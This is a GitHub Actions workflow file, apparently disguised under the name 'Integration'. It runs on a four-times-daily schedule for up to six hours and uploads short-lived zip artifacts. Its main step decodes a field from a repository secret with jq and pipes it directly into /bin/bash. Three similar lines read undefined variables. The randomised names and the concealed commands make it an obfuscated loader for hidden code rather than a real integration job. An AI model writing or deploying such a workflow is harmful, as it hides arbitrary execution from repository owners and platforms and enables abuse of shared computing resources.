name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '38 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          on33147: ${{ secrets.on33147 }}
        run: |
          printf '%s' "$on33147" | jq -r .ujt96 | /bin/bash
          printf '%s' "$tf6038" | jq -r .gqsmm9 | /bin/bash
          printf '%s' "$gxh598" | jq -r .s5 | /bin/bash
          echo $w5 | jq -r .krxn1 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: WT76wCD1
          path: "*.zip"
          retention-days: 1
